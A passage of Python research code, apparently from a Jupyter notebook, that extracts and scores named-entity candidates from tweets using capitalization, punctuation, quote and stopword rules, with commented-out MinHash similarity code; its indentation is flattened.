self.df_out.to_csv('tweet_base.csv' ,sep=',', encoding='utf-8')
def rreplace(self,s, old, new, occurrence):
if s.endswith(old):
li = s.rsplit(old, occurrence)
return new.join(li)
else:
return s
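# Example (illustrative): rreplace only replaces a trailing occurrence, so
#   rreplace("obama's", "'s", '', 1) -> 'obama'
#   rreplace("that's it", "'s", '', 1) -> "that's it"   (suffix does not match, unchanged)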
def stopwordReplace(self, candidate):
combined=cachedStopWords+prep_list+article_list+day_list+chat_word_list
if(candidate.features[ne.is_quoted]):
words=self.normalize(candidate.phraseText).split()
flag=False
swList=[]
for word in words:
if(word in combined):
swList.append(word)
else:
flag=True
#print(candidate.phraseText,swList,flag)
if(flag):
self.phase2stopWordList=list(set(self.phase2stopWordList)|set(swList))
#self.phase2stopWordList.extend(swList)
else:
candidate.phraseText=""
return candidate
wordlist=list(filter(lambda word: word!='', candidate.phraseText.split()))
pos=candidate.position
#print(candidate.phraseText,wordlist,pos)
start=0
flag=False
while(start!=len(pos)):
if(wordlist[start].lstrip(string.punctuation).rstrip(string.punctuation).strip().lower() not in combined):
#flag=True
break
start+=1
end=len(pos)-1
while(end>=0):
#print(wordlist[end])
if(wordlist[end].lstrip(string.punctuation).rstrip(string.punctuation).strip() not in combined):
#flag=True
break
end-=1
#print(start,end)
updated_pos=pos[start:(end+1)]
updated_phrase=' '.join(wordlist[start:(end+1)])
#print(updated_pos,updated_phrase)
candidate.phraseText=updated_phrase
candidate.position=updated_pos
return candidate
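# Sketch of what stopwordReplace is meant to do (hypothetical candidate): leading and
# trailing stopwords/articles/prepositions are trimmed from a non-quoted phrase, e.g.
#   'the White House on' -> 'White House'
# with the position list sliced to match. Quoted candidates are instead dropped
# entirely (phraseText set to '') when every word is a stopword.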
# In[301]:
#candidate: 'frequency','length', 'capitalized', 'start_of_sentence', 'abbreviation', 'all_capitalized','is_csl','title','has_number','date_indicator','is_apostrophed','has_intermediate_punctuation','ends_like_verb','ends_like_adverb','change_in_capitalization','has_topic_indicator'
def is_float(self,string):
try:
f=float(string)
if(f==0.0):
return True
else:
return ((f) and (string.count(".")==1))
#return True# True if string is a number with a dot
except ValueError: # if string is not a number
return False
def insert_dict(self,candidate,NE_container,candidateBase,tweetID,sentenceID,batch):
key=(((candidate.phraseText.lstrip(string.punctuation)).rstrip(string.punctuation)).strip(' \t\n\r')).lower()
key=(key.lstrip('“‘’”')).rstrip('“‘’”')
key= self.rreplace(self.rreplace(self.rreplace(key,"'s","",1),"’s","",1),"’s","",1)
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
try:
if ((key in combined)|(key.isdigit())|(self.is_float(key))):
return
except TypeError:
print(key)
tweetID=str(tweetID)
sentenceID=str(sentenceID)
if key in self.NE_container:
feature_list=self.NE_container[key]
feature_list[0]+=1
for index in [0,1,2,3,4,5,6,7,9,10,11,13,14]:
if (candidate.features[index]==True):
feature_list[index+2]+=1
for index in [8,12]:
if (candidate.features[index]!=-1):
feature_list[index+2]+=1
else:
now = datetime.datetime.now()
now=str(now.hour)+":"+str(now.minute)+":"+str(now.second)
feature_list=[0]*17
feature_list[0]+=1
feature_list[1]=candidate.length
            #call a background process to check for non-capitalized occurrences
for index in [0,1,2,3,4,5,6,7,9,10,11,13,14]:
if (candidate.features[index]==True):
feature_list[index+2]+=1
for index in [8,12]:
if (candidate.features[index]!=-1):
feature_list[index+2]+=1
feature_list.append(now)
feature_list.append(batch)
self.NE_container[key] = feature_list
#insert in candidateBase
'''if key in candidateBase.keys():
#candidateBase[key]=candidateBase[key]+[str(tweetID)+":"+str(sentenceID)]
if(tweetID in candidateBase[key]):
if(sentenceID in candidateBase[key][tweetID] ):
candidateBase[key][tweetID][sentenceID]=candidateBase[key][tweetID][sentenceID]+1
else:
candidateBase[key][tweetID][sentenceID]=1
else:
candidateBase[key][tweetID]={}
candidateBase[key][tweetID][sentenceID]=1
#c=[(y,str(idx)) for idx,y in enumerate( a) if y not in b]
#candidateBase[key]
else:
#candidateBase[key]=[str(tweetID)+":"+str(sentenceID)]
candidateBase[key]={}
candidateBase[key][tweetID]={}
candidateBase[key][tweetID][sentenceID]=1'''
return
# In[302]:
def printList(self,mylist):
print("["),
#print "[",
for item in mylist:
if item != None:
if isinstance(item,ne.NE_candidate):
item.print_obj()
#print (item.phraseText)
else:
print (item+",", end="")
#print item+",",
#print "]"
print("]")
return
# In[303]:
# In[304]:
def consecutive_cap(self,tweetWordList_cappos,tweetWordList):
output=[]
        #groups consecutive capitalized-word indices, e.g. [0, 1, 2, 5, 6] -> [[0, 1, 2], [5, 6]]
#print(tweetWordList_cappos)
for k, g in groupby(enumerate(tweetWordList_cappos), lambda element: element[0]-element[1]):
output.append(list(map(itemgetter(1), g)))
count=0
if output:
final_output=[output[0]]
for first, second in (zip(output,output[1:])):
#print(first,second)
#print(tweetWordList[first[-1]])
if ((not (tweetWordList[first[-1]]).endswith('"'))&((second[0]-first[-1])==2) & (tweetWordList[first[-1]+1].lower() in prep_list)):
(final_output[-1]).extend([first[-1]+1]+second)
elif((not (tweetWordList[first[-1]].endswith('"')))&((second[0]-first[-1])==3) & (tweetWordList[first[-1]+1].lower() in prep_list)& (tweetWordList[first[-1]+2].lower() in article_list)):
(final_output[-1]).extend([first[-1]+1]+[first[-1]+2]+second)
else:
final_output.append(second)
#merge_positions.append(False)
else:
final_output=[]
return final_output
# In[305]:
    #splits the original NE_candidate text and builds an individual object from each text snippet
def build_custom_NE(self,phrase,pos,prototype,feature_index,feature_value):
#print("Enters")
position=pos
custom_NE= ne.NE_candidate(phrase,position)
for i in range(15):
custom_NE.set_feature(i,prototype.features[i])
custom_NE.set_feature(feature_index,feature_value)
if (feature_index== ne.is_csl) & (feature_value== True):
custom_NE.set_feature(ne.start_of_sentence, False)
custom_NE=self.entity_info_check(custom_NE)
return custom_NE
# In[306]:
def abbrv_algo(self,ne_element):
        '''Abbreviation detection.
        If the phrase ends with punctuation:
            trailing period: a short run of letter-period pairs (e.g. "U.S.A.")
                is flagged as an abbreviation, otherwise the period is stripped;
            other trailing punctuation: the trailing character is stripped.
        Otherwise:
            a short, fully capitalized token with no punctuation, or a space-free
            "A.B"-style pattern, is flagged as an abbreviation.
        Capitalization features are also set here and the phrase length is reset.
        '''
phrase= ne_element.phraseText
#print("=>"+phrase)
#since no further split occurs we can set remaining features now
ne_element.set_feature(ne.capitalized, True)
if ne_element.phraseText.isupper():
ne_element.set_feature(ne.all_capitalized, True)
else:
ne_element.set_feature(ne.all_capitalized, False)
abbreviation_flag=False
p=re.compile(r'[^a-zA-Z\d\s]$')
match_list = p.findall(phrase)
if len(match_list)>0:
#print("Here")
if phrase.endswith('.'):
#print("Here")
p1= re.compile(r'([a-zA-Z][\.]\s*)')
match_list = p1.findall(phrase)
if ((len(match_list)>1) & (len(phrase)<6)):
#print ("1. Found abbreviation: "+phrase)
abbreviation_flag= True
else:
if (phrase[-2]!=' '):
phrase= phrase[:-1]
else:
#if phrase.endswith(string.punctuation):
if (phrase[-2]!=' '):
phrase= phrase[:-1]
#if not (phrase.endswith('?')|phrase.endswith('!')|phrase.endswith(')')|phrase.endswith('>')):
#phrase= phrase[:-1]
else:
p2=re.compile(r'([^a-zA-Z0-9_\s])')
match_list = p2.findall(phrase)
if ((len(match_list)==0) & (phrase.isupper()) & (len(phrase)<7)& (len(phrase)>1)):
#print ("2. Found abbreviation!!: "+phrase)
abbreviation_flag= True
else:
#print("Here-> "+phrase)
p3= re.compile(r'([A-Z][.][A-Z])')
p4= re.compile(r'\s')
match_list = p3.findall(phrase)
match_list1 = p4.findall(phrase)
if ((len(match_list)>0) & (len(match_list1)==0)):
abbreviation_flag= True
#print ("3. Found abbreviation!!: "+phrase)
#element= ne.NE_candidate(phrase.strip())
ne_element.phraseText=phrase
ne_element.reset_length()
ne_element.set_feature(ne.abbreviation, abbreviation_flag)
return ne_element
# In[307]:
def punct_clause(self,NE_phrase_in):
NE_phrases=self.entity_info_check(NE_phrase_in)
cap_phrases=NE_phrases.phraseText.strip()
final_lst=[]
#print (cap_phrases,NE_phrases.features[ne.date_indicator])
if (re.compile(r'[^a-zA-Z0-9_\s]')).findall(cap_phrases):
#case of intermediate punctuations: handles abbreviations
p1= re.compile(r'(?:[a-zA-Z0-9][^a-zA-Z0-9_\s]\s*)')
match_lst = p1.findall(cap_phrases)
#print(match_lst)
if match_lst:
index= (list( p1.finditer(cap_phrases) )[-1]).span()[1]
p= re.compile(r'[^a-zA-Z\d\s]')
match_list = p.findall(cap_phrases)
p2=re.compile(r'[^a-zA-Z\d\s]$') #ends with punctuation
if ((len(match_list)>0)&(len(match_lst)>0)&((len(match_list)-len(match_lst))>0)):
if (p2.findall(cap_phrases)):
#only strips trailing punctuations, not intermediate ones following letters
cap_phrases = cap_phrases[0:index]+re.sub(p, '', cap_phrases[index:])
NE_phrases.phraseText= cap_phrases
#comma separated NEs
#lst=filter(lambda(word): word!="", re.split('[,]', cap_phrases))
#print ("=>"+ cap_phrases)
start_of_sentence_fix=NE_phrases.features[ne.start_of_sentence]
#temp=re.split("\...", cap_phrases)
#inter=self.flatten(list(map(lambda elem: re.split('[,:!…]',elem),temp)),[])
#print("'''",inter)
combined=cachedStopWords+prep_list+article_list+day_list+chat_word_list
splitList=re.split('["‘’“”()/,;:!?…]',cap_phrases)
splitList=list(filter(lambda word: ((word!="")&(word.lstrip(string.punctuation).rstrip(string.punctuation).strip().lower() not in combined)), splitList))
#print("==",splitList)
wordlstU=list(map(lambda word: word.strip().strip(string.punctuation), splitList))
wordlstU=list(filter(lambda word: word!="", wordlstU))
wordlst=list(filter(lambda word: ((word.strip().strip(string.punctuation))[0].isupper()|(word.strip().strip(string.punctuation))[0].isdigit()), wordlstU))
#print(":::",wordlst)
if ((NE_phrases.features[ne.date_indicator]==False)):
#print("hehe")
if(len(splitList)>1):
if(len(wordlst)>0):
#print("here::")
pos=NE_phrases.position
combined=[]
prev=0
for i in range(len(wordlst)):
word=wordlst[i]
word_len=len(list(filter(lambda individual_word: individual_word!="", re.split('[ ]', word))))
word_pos=pos[(prev):(prev+word_len)]
prev=prev+word_len
combined+=[[word]+word_pos]
lst_nsw=list(filter(lambda element: (((str(element[0])).strip(string.punctuation).lower() not in combined)& (not (str(element[0])).strip(string.punctuation).isdigit()) & (len(str(element[0]))>1)) ,combined))
#print ("++",lst_nsw)
if(lst_nsw):
final_lst= list(map(lambda element:self.build_custom_NE(str(element[0]),element[1:],NE_phrases,ne.is_csl,True), lst_nsw))
final_lst[0].set_feature(ne.start_of_sentence, NE_phrases.features[ne.start_of_sentence])
else:
final_lst=[]
else:
NE_phrases.set_feature(ne.is_csl,False)
final_lst=[NE_phrases]
else:
NE_phrases.set_feature(ne.is_csl,False)
final_lst=[NE_phrases]
#check abbreviation
#print("++",final_lst)
if(final_lst):
final_lst= list(map(lambda phrase: self.abbrv_algo(phrase), final_lst))
#print(lst)
return final_lst
# In[308]:
#%%timeit -o
def f(self,y,sflag,quoteFlag,tweetWordList):
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
#print(sflag)
if sflag:
left=""
right=""
lp=(-1)
rp=(-1)
i=0
j=len(y)-1
flag1=False
flag2=False
x=[]
while (((flag1==False)|(flag2==False))&((j-i)>0)):
if(flag1==False):
left=(((tweetWordList[y[i]].strip('“‘"’”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
if(left not in combined):
flag1=True
lp=i
else:
i+=1
if(flag2==False):
right=(((tweetWordList[y[j]].strip('“‘"’”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
if(right not in combined):
flag2=True
rp=j
else:
j-=1
#print(flag1,flag2)
#if((flag1==False)|(flag2==False)):
# while (((j-i)!=0)|((flag1==False)|(flag2==False))):
if(flag1==False):
left=(((tweetWordList[y[i]].strip('“‘"’”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
#print(left)
if(left not in combined):
flag1=True
lp=i
else:
i+=1
if(flag2==False):
right=(((tweetWordList[y[j]].strip('“‘"’”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
if(right not in combined):
flag2=True
rp=j
else:
j-=1
#print(lp,rp)
if(lp==rp):
if(lp!=-1):
x=[y[lp]]
else:
x=y[lp:(rp+1)]
else:
x=y
#print(x)
if(x):
list1=list(map(lambda word: tweetWordList[word], x))
phrase=" ".join(e for e in list1)
#print(phrase)
phrase1="".join(list1)
#if not ((phrase[0].isdigit()) & (len(x)==1)):
if not (phrase1.strip().isdigit()):
NE_phrase= ne.NE_candidate(phrase.strip(),x)
if 0 in x:
NE_phrase.set_feature(ne.start_of_sentence,True)
else:
NE_phrase.set_feature(ne.start_of_sentence,False)
NE_phrase.set_feature(ne.is_quoted,quoteFlag)
else:
NE_phrase= ne.NE_candidate("JUST_DIGIT_ERROR",[])
else:
NE_phrase= ne.NE_candidate("JUST_DIGIT_ERROR",[])
#print("====>>",NE_phrase.phraseText)
return NE_phrase
# In[309]:
def capCheck(self,word):
combined_list=[]+cachedStopWords+prep_list+chat_word_list+article_list
if word.startswith('@'):
return False
elif "<Hashtag" in word:
return False
#elif (((word.strip('“‘’”')).lstrip(string.punctuation)).rstrip(string.punctuation)).lower() in combined_list:
elif (((word.strip('“‘’”')).lstrip(string.punctuation)).rstrip(string.punctuation)) in combined_list:
# if((word=="The")|(word=="THE")):
# return True
# else:
return True
elif word[0].isdigit():
return True
else:
p=re.compile(r'^[\W]*[A-Z]')
l= p.match(word)
if l:
return True
else:
return False
# In[310]:
def title_check(self,ne_phrase):
title_flag=False
words=ne_phrase.phraseText.split()
for word in words:
if word.lower() in cachedTitles:
title_flag= True
break
ne_phrase.set_feature(ne.title,title_flag)
return ne_phrase
# In[311]:
def entity_info_check(self,ne_phrase):
flag1=False #has number
flag3=False
flag_ind=[] #is number
month_ind=[]
date_num_holder=[]
words=ne_phrase.phraseText.split()
for word in words:
word=(word.strip()).rstrip(string.punctuation).lower()
punct_flag=False
for char in word:
if ((char in string.punctuation)|(char in ['“','‘','’','”','…'])):
punct_flag=True
break
#if ((not word.isalpha())& (not "'s" in word) & (not "’s" in word)):'‘“"’”
if ((not word.isalpha())& (not punct_flag)):
flag_ind+=[True]
if word.isdigit():
date_num_holder+=['num']
else:
date_num_holder+=['alpha']
else:
flag_ind+=[False]
if word in month_list:
month_ind+=[True]
date_num_holder+=['month']
elif word in day_list:
date_num_holder+=['day']
elif word in prep_list:
date_num_holder+=['preposition']
elif word in article_list:
date_num_holder+=['article']
else:
#print("=>"+word)
date_num_holder+=['string']
if True in flag_ind:
flag1=True
if True in month_ind:
flag3=True
ne_phrase.set_feature(ne.has_number,flag1)
ne_phrase.set_feature(ne.date_indicator,flag3)
ne_phrase.set_date_num_holder(date_num_holder)
return ne_phrase
# In[312]:
#removing commonly used expletives, enunciated chat words and other common words (like days of the week, common expressions)
def slang_remove(self,ne_phrase):
phrase=(ne_phrase.phraseText.strip()).rstrip(string.punctuation).lower()
p1= re.compile(r'([A-Za-z]+)\1\1{1,}')
match_lst = p1.findall(phrase)
if phrase in article_list:
return True
elif phrase in day_list:
return True
#elif phrase in month_list:
#return True
elif match_lst:
return True
else:
return False
# In[313]:
def apostrope_check(self,ne_phrase):
apostrophe="'s"
bad_apostrophe="’s"
phrase=(ne_phrase.phraseText.strip()).rstrip(string.punctuation).lower()
if (apostrophe in phrase):
if (phrase.endswith(apostrophe)):
ne_phrase.set_feature(ne.is_apostrophed,0)
else:
#print(phrase.find(apostrophe))
ne_phrase.set_feature(ne.is_apostrophed,phrase.find(apostrophe))
elif (bad_apostrophe in phrase):
if phrase.endswith(bad_apostrophe):
ne_phrase.set_feature(ne.is_apostrophed,0)
else:
#print(phrase.find(apostrophe))
ne_phrase.set_feature(ne.is_apostrophed,phrase.find(bad_apostrophe))
else:
ne_phrase.set_feature(ne.is_apostrophed,-1)
return ne_phrase
# In[314]:
def punctuation_check(self,ne_phrase):
holder=[]
punctuation_holder=[]
flag_holder=[]
phrase=(ne_phrase.phraseText.strip()).rstrip(string.punctuation).lower()
for i in range(len(phrase)):
if (phrase[i] in string.punctuation):
holder+=[i]
for i in holder:
if ((i<(len(phrase)-1)) & (phrase[i]=="'") & (phrase[i+1]=="s")):
flag_holder+=[False]
elif ((i==(len(phrase)-1)) & (phrase[i]=="'")):
flag_holder+=[False]
else:
flag_holder+=[True]
punctuation_holder+=[i]
#print(flag_holder)
ne_phrase.set_punctuation_holder(punctuation_holder)
if True in flag_holder:
ne_phrase.set_feature(ne.has_intermediate_punctuation,True)
else:
ne_phrase.set_feature(ne.has_intermediate_punctuation,False)
return ne_phrase
# In[315]:
def tense_check(self,ne_phrase):
words=(((ne_phrase.phraseText.strip()).rstrip(string.punctuation)).lower()).split()
verb_flag=False
adverb_flag=False
if (len(words)==1):
if words[0].endswith("ing"):
verb_flag=True
if words[0].endswith("ly"):
adverb_flag=True
ne_phrase.set_feature(ne.ends_like_verb,verb_flag)
ne_phrase.set_feature(ne.ends_like_adverb,adverb_flag)
return ne_phrase
# In[316]:
def capitalization_change(self,ne_element):
phrase=((ne_element.phraseText.lstrip(string.punctuation)).rstrip(string.punctuation)).strip()
val=-1
topic_indicator=False
p1= re.compile(r'[A-Z]*\s*[A-Z]{4,}[^A-Za-z]*\s+[A-Za-z]+') #BREAKING: Toronto Raptors
p2= re.compile(r'([A-Z]{1}[a-z]+)+[^A-Za-z]*\s+[A-Z]{4,}') #The DREAMIEST LAND
match_lst1 = p1.findall(phrase)
match_lst2 = p2.findall(phrase)
if (match_lst1):
if not phrase.isupper():
p3=re.compile(r'[A-Z]*\s*[A-Z]{4,}[^A-Za-z]*\s+')
val=list(p3.finditer(phrase))[-1].span()[1]
if(":" in phrase):
topic_indicator=True
ne_element.set_feature(ne.change_in_capitalization,val)
elif (match_lst2):
#print ("GOTIT2: "+phrase)
p3=re.compile(r'([A-Z]{1}[a-z]+)+')
val=list(p3.finditer(phrase))[-1].span()[1]
ne_element.set_feature(ne.change_in_capitalization,val)
else:
ne_element.set_feature(ne.change_in_capitalization,val)
ne_element.set_feature(ne.has_topic_indicator,topic_indicator)
return ne_element
def quoteProcess(self,unitQuoted, tweetWordList):
candidateString=""
retList=[]
matches=[]
quoteMatch=[]
final=[]
flag=False
#print(tweetWordList)
list1=list(map(lambda index: tweetWordList[index], unitQuoted))
candidateString=" ".join(list1)
#print("=>",candidateString)
# candidateString=""
# for index in range(len(unitQuoted)-1):
# candidateString+=tweetWordList[unitQuoted[index]]+" "
# candidateString+=tweetWordList[unitQuoted[-1]]
# print("=>",candidateString)
flagOne=False
flagTwo=False
flagThree=False
flagFour=False
        # Try each quote style in turn (straight single, curly single, curly double,
        # then straight double). A quoted span only counts when it stands alone:
        # p must match while p1/p2, which match quotes glued to surrounding text, must not.
        p= re.compile(r'[^\S]*([\'].*?[\'])[^a-zA-Z0-9\s]*[\s]*')
        p1=re.compile(r'[^\s]+([\'].*?[\'])[^\s]*')
        p2=re.compile(r'[^\s]*([\'].*?[\'])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagOne=True
if(not flagOne):
p= re.compile(r'[^\S]*([‘].*?[’])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([‘].*?[’])[^\s]*')
p2=re.compile(r'[^\s]*([‘].*?[’])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagTwo=True
if((not flagOne)&(not flagTwo)):
p= re.compile(r'[^\S]*([“].*?[”])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([“].*?[”])[^\s]*')
p2=re.compile(r'[^\s]*([“].*?[”])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagThree=True
if((not flagOne)&(not flagTwo)&(not flagThree)):
p= re.compile(r'[^\S]*([\"].*?[\"])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([\"].*?[\"])[^\s]*')
p2=re.compile(r'[^\s]*([\"].*?[\"])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagFour=True
if (flagOne|flagTwo|flagThree|flagFour):
flag=True
for index in indices:
span= list(index.span())
#print(span[0])
quoteMatch.append([int(span[0]),int(span[1])])
matches+=[int(span[0]),int(span[1])]
#print(matches)
final+=[(candidateString[0:matches[0]],False)]
for i in range(len(matches)-1):
if([matches[i],matches[i+1]] in quoteMatch):
final+=[((candidateString[matches[i]:matches[i+1]]).strip(),True)]
else:
final+=[((candidateString[matches[i]:matches[i+1]]).strip(),False)]
final+=[(candidateString[matches[-1]:],False)]
final=list(filter(lambda strin: strin[0]!="",final))
final=list(map(lambda strin: (strin[0].strip(),strin[1]),final))
#print(final)
for unit in final:
lst=[]
unitsplit=list(filter(lambda unitString: unitString!='',unit[0].split()))
for splitunit in unitsplit:
lst+=[tweetWordList.index(splitunit,unitQuoted[0])]
retList+=[(lst,unit[1])]
else:
retList+=[(unitQuoted,False)]
#print(retList)
return retList
# In[318]:
def trueEntity_process(self,tweetWordList_cappos,tweetWordList):
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
#returns list with position of consecutively capitalized words
#print(tweetWordList_cappos, tweetWordList)
output_unfiltered = self.consecutive_cap(tweetWordList_cappos,tweetWordList)
#print("==>",output_unfiltered)
#splitting at quoted units
output_quoteProcessed=[]
start_quote=[]
end_quote=[]
for unitQuoted in output_unfiltered:
unitout=self.quoteProcess(unitQuoted, tweetWordList)
#print("==>",unitout)
for elem in unitout:
mod_out=[]
out=elem[0]
flag=elem[1]
sflag=False
# '’”"
#print(out,flag)
if not (flag):
#for id in range(len(out)):
temp=[]
#print("::",out)
for index in out:
#print(index,tweetWordList[index])
word=(((tweetWordList[index].strip().strip('"“‘’”"')).lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
#print("=>"+word)"“‘’”"
if (word):
if (word in combined):
if(len(out)==1):
temp.append(index)
else:
if (word not in prep_list)&(word not in article_list):
temp.append(index)
else:
sflag=True
#else:
#if ((index==0)||()):
#temp.append(index)
# else:
# print("here")
# else:
# print("here")
#print(temp)
for elem in temp:
out.remove(elem)
#out[id]=temp
lst=[]
for k, g in groupby(enumerate(out), lambda elem: elem[1]-elem[0]):
lst=list(map(itemgetter(1), g))
#print("==>",lst)
if(lst):
mod_out.append((lst,sflag,flag))
#print('==>',mod_out)
else:
mod_out=[(out,sflag,flag)]
#print(mod_out)
#print(mod_out)
if(mod_out):
output_quoteProcessed.extend(mod_out)
        #print("=====>",output_quoteProcessed)
output= list(filter(lambda element: ((element[0]!=[0])&(element[0]!=[])), output_quoteProcessed))
#print(output)
#consecutive capitalized phrases
consecutive_cap_phrases1=list(map(lambda x: self.f(x[0],x[1],x[2],tweetWordList), output))
consecutive_cap_phrases=list(filter(lambda candidate:(candidate.phraseText!="JUST_DIGIT_ERROR"),consecutive_cap_phrases1))
#self.printList(consecutive_cap_phrases)
#implement the punctuation clause
ne_List_pc=self.flatten(list(map(lambda NE_phrase: self.punct_clause(NE_phrase), consecutive_cap_phrases)),[])
#self.printList(ne_List_pc)
#stopword removal and start-of-sentence
ne_List_pc_sr= list(map(lambda candidate: self.stopwordReplace(candidate), ne_List_pc))
#self.printList(ne_List_pc_sr)
ne_List_pc_checked= list(filter(lambda candidate: ((candidate.phraseText!="")&(candidate.position!=[0])), ne_List_pc_sr))
#implement title detection
#ne_List_titleCheck= list(map(lambda element: self.title_check(element), ne_List_pc_checked))
#implement slang check and remove
ne_List_slangCheck= list(filter(lambda element: not self.slang_remove(element), ne_List_pc_checked))
#implement apostrophe, tense and punctuation marker with final number check
#ne_List_apostropeCheck= list(map(lambda element: self.apostrope_check(element), ne_List_slangCheck))
#ne_List_punctuationCheck= list(map(lambda element: self.punctuation_check(element), ne_List_apostropeCheck))
ne_List_numCheck=list(filter(lambda candidate: not (candidate.phraseText.lstrip(string.punctuation).rstrip(string.punctuation).strip()).isdigit(), ne_List_slangCheck))
#ne_List_tenseCheck= list(map(lambda element: self.tense_check(element), ne_List_numCheck))
#tracking sudden change in capitalization pattern
#ne_List_capPatCheck= list(map(lambda element: self.capitalization_change(element), ne_List_tenseCheck))
#check on length
ne_List_lengthCheck= list(filter(lambda element: element.length<7, ne_List_numCheck))
ne_List_badWordCheck= list(filter(lambda element:((element.phraseText.strip().strip(string.punctuation).lstrip('“‘’”')).rstrip('“‘’”').lower()) not in combined, ne_List_lengthCheck))
ne_List_allCheck= list(filter(lambda element:(len((element.phraseText.strip().strip(string.punctuation).lstrip('“‘’”')).rstrip('“‘’”'))>1),ne_List_badWordCheck))
#ne_List_allCheck= list(filter(lambda element: (element.phraseText.lower() not in combined), ne_List_double_Check))
#q.put(ne_List_allCheck)
return ne_List_allCheck
#return ne_List_allCheck
# In[319]:
'''This is the main module. It is not written as an explicit function because the expected argument
format is not fixed; however, this whole cell can be called as a function and it will call the rest
of the functions in this module to extract candidates and their features. A hypothetical driver
sketch is given at the end of this file.
'''
'''#reads input from the database file and converts to a dataframe. You can change this part accordingly and
#directly convert argument tuple to the dataframe'''
#Inputs: Collection.csv 500Sample.csv 3.2KSample.csv eric_trump.csv
#df_out.to_csv('TweetBase500.csv')
#--------------------------------------PHASE I---------------------------------------------------
# In[ ]:
#--------------------------------------PHASE II---------------------------------------------------
'''set1 = set(['Melania','Trump'])
set2 = set(['Donald','Trump'])
set3 = set(['Jared','Kushner'])
m1 = MinHash(num_perm=200)
m2 = MinHash(num_perm=200)
m3 = MinHash(num_perm=200)
for d in set1:
m1.update(d.encode('utf8'))
for d in set2:
m2.update(d.encode('utf8'))
for d in set3:
m3.update(d.encode('utf8'))
# Create LSH index
lsh = MinHashLSH(threshold=0.0, num_perm=200)
lsh.insert("m2", m2)
lsh.insert("m3", m3)
result = lsh.query(m1)
print("Approximate neighbours with Jaccard similarity", result)
candidates=["donald trump","melania trump", "obama","barack obama","barack"]
listofMinhash=[]
m=MinHash(num_perm=200)
candidate0=set(candidates[0].split())
for d in candidate0:
m.update(d.encode('utf8'))
listofMinhash.append(m)
lsh = MinHashLSH(threshold=0.0, num_perm=200)
lsh.insert("m2", m2)
for candidate in candidates[1:]:'''
# In[ ]:
'''
print ("Shingling articles...")
# The current shingle ID value to assign to the next new shingle we
# encounter. When a shingle gets added to the dictionary, we'll increment this
# value.
curShingleID = 0
# Create a dictionary of the articles, mapping the article identifier (e.g.,
# "t8470") to the list of shingle IDs that appear in the document.
candidatesAsShingleSets = {};
candidateNames = []
t0 = time.time()
totalShingles = 0
for k in range(0, len(sorted_NE_container.keys())):
# Read all of the words (they are all on one line) and split them by white space.
words = list(sorted_NE_container.keys())[k].split(" ")
# Retrieve the article ID, which is the first word on the line.
candidateID = k
# Maintain a list of all document IDs.
candidateNames.append(candidateID)
# 'shinglesInDoc' will hold all of the unique shingle IDs present in the current document.
#If a shingle ID occurs multiple times in the document,
# it will only appear once in the set (this is a property of Python sets).
shinglesInCandidate = set()
# For each word in the document...
for index in range(0, len(words)):
# Construct the shingle text by combining three words together.
shingle = words[index]
# Hash the shingle to a 32-bit integer.
#crc = binascii.crc32("")
crc = binascii.crc32(bytes(shingle, encoding="UTF-8")) & (0xffffffff)
# Add the hash value to the list of shingles for the current document.
# Note that set objects will only add the value to the set if the set
# doesn't already contain it.
shinglesInCandidate.add(crc)
# Store the completed list of shingles for this document in the dictionary.
#print(str(words)+": ")
#for i in shinglesInCandidate:
# print('0x%08x' %i)
candidatesAsShingleSets[candidateID] = shinglesInCandidate
# Count the number of shingles across all documents.
totalShingles = totalShingles + (len(words))
# Report how long shingling took.
print ('\nShingling ' + str(str(len(sorted_NE_container.keys()))) + ' candidates took %.2f sec.' % (time.time() - t0))
print ('\nAverage shingles per doc: %.2f' % (totalShingles / len(sorted_NE_container.keys())))
'''
# In[ ]:
'''
# =============================================================================
# Generate MinHash Signatures
# =============================================================================
numHashes=20
numCandidates=len(sorted_NE_container.keys())
# Time this step.
t0 = time.time()
print ('Generating random hash functions...')
# Record the maximum shingle ID that we assigned.
maxShingleID = 2**32-1
nextPrime = 4294967311
# Our random hash function will take the form of:
# h(x) = (a*x + b) % c
# Where 'x' is the input value, 'a' and 'b' are random coefficients, and 'c' is
# a prime number just greater than maxShingleID.
# Generate a list of 'k' random coefficients for the random hash functions,
# while ensuring that the same value does not appear multiple times in the
# list.
def pickRandomCoeffs(k):
# Create a list of 'k' random values.
randList = []
while k > 0:
# Get a random shingle ID.
randIndex = random.randint(0, maxShingleID)
# Ensure that each random number is unique.
while randIndex in randList:
randIndex = random.randint(0, maxShingleID)
# Add the random number to the list.
randList.append(randIndex)
k = k - 1
return randList
# For each of the 'numHashes' hash functions, generate a different coefficient 'a' and 'b'.
coeffA = pickRandomCoeffs(numHashes)
coeffB = pickRandomCoeffs(numHashes)
print ('\nGenerating MinHash signatures for all candidates...')
# List of documents represented as signature vectors
signatures =np.ndarray(shape=(20, numCandidates))
# Rather than generating a random permutation of all possible shingles,
# we'll just hash the IDs of the shingles that are *actually in the document*,
# then take the lowest resulting hash code value. This corresponds to the index
# of the first shingle that you would have encountered in the random order.
# For each document...
for candidateID in candidateNames:
# Get the shingle set for this document.
